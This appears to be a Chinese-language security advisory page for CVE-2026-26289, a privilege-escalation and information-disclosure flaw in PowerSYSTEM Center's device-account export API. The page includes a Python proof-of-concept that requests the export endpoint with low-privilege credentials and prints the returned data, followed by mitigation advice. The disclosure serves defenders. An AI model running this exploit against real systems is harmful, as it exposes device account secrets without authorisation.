IPBUF安全漏洞报告
English
CVE-2026-26289 CVSS 8.2 高危

CVE-2026-26289 PowerSYSTEM Center越权访问漏洞

披露日期: 2026-05-12

漏洞信息

漏洞编号
CVE-2026-26289
漏洞类型
越权访问
CVSS评分
8.2 高危
攻击向量
邻接 (AV:A)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
PowerSYSTEM Center

相关标签

CVE-2026-26289越权访问信息泄露PowerSYSTEM CenterREST API

漏洞概述

PowerSYSTEM Center的REST API中设备账户导出端点存在安全漏洞。由于权限校验不严,拥有低权限的经过身份验证的用户可以利用该接口访问本应仅限管理员权限的敏感信息。该漏洞CVSS评分为8.2,属于高危级别,攻击者无需用户交互即可在邻接网络中利用此漏洞。

技术细节

该漏洞属于垂直越权漏洞。其根本原因是PowerSYSTEM Center在处理设备账户导出请求时,REST API端点未能正确实施基于角色的访问控制(RBAC)。虽然接口要求身份认证(PR:L),但未在逻辑层验证请求者是否具备管理员权限。攻击者通过在邻接网络中捕获或获取低权限账户凭证,构造特定的HTTP请求直接访问导出端点。服务器返回时未进行拦截,导致敏感的设备账户信息泄露。由于S:C(范围改变),此漏洞可能影响同一安全范围内的其他服务。

攻击链分析

STEP 1
步骤1:获取访问权限
攻击者在邻接网络中获得一个合法的低权限用户账户凭证。
STEP 2
步骤2:构造恶意请求
利用该凭证向存在漏洞的REST API设备账户导出端点发送GET请求。
STEP 3
步骤3:权限绕过与数据泄露
服务器端未能校验权限,返回敏感的设备账户信息,导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # PoC for CVE-2026-26289 # Description: Privilege Escalation / Information Disclosure in PowerSYSTEM Center # Target configuration target_host = "https://powersystem-center.example.com" vulnerable_endpoint = "/api/v1/devices/export/accounts" url = target_host + vulnerable_endpoint # Low privilege credentials (required) username = "low_priv_user" password = "user_password" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-26289-Scanner)", "Accept": "application/json" } def exploit(): try: print(f"[*] Attempting to connect to {url}...") # Send authenticated request response = requests.get(url, auth=(username, password), headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Sensitive data obtained:") print(response.text) elif response.status_code == 403: print("[-] Access denied. Endpoint may be patched.") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {str(e)}") if __name__ == "__main__": exploit()

影响范围

PowerSYSTEM Center (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施
在应用官方补丁之前,建议管理员在网络层面限制对设备账户导出API的访问,例如通过防火墙规则仅允许管理主机访问。同时,应立即审计系统日志,检查是否存在低权限账户异常访问该接口的记录,并重置可能泄露的敏感账户凭据。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表